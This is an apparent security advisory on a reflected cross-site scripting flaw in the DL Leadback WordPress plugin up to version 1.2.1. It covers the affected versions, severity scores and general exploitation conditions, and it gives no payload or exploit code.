Improper neutralization of user input during web page generation allows an attacker to inject malicious script that is reflected back to the victim’s browser. The injected script runs with the victim’s privileges and can steal session cookies, deface content, hijack navigation, or perform other client‑side attacks. The vulnerability is independent of authentication; any user who visits a crafted URL can be affected. It is identified as a reflective XSS flaw on the WordPress DL Leadback plugin.

The vulnerability affects the DL Leadback plugin for WordPress, developed by DyadyaLesha. All installations of the plugin from its initial release through version 1.2.1 are impacted, regardless of whether the site runs an earlier or the latest 1.2.1 build.

With a CVSS score of 7.1 the flaw is considered high severity, yet the EPSS score of less than 1% indicates a low probability of exploitation in the wild. The vulnerability is not listed in the CISA KEV catalog, suggesting that no large‑scale, documented exploits are currently known. The attack hinges on a maliciously crafted URL that is delivered to or clicked by a user; the victim’s browser must render the reflected payload. No elevated privileges or server‑side access are required for exploitation, but social engineering to entice the target to visit the URL is usually necessary.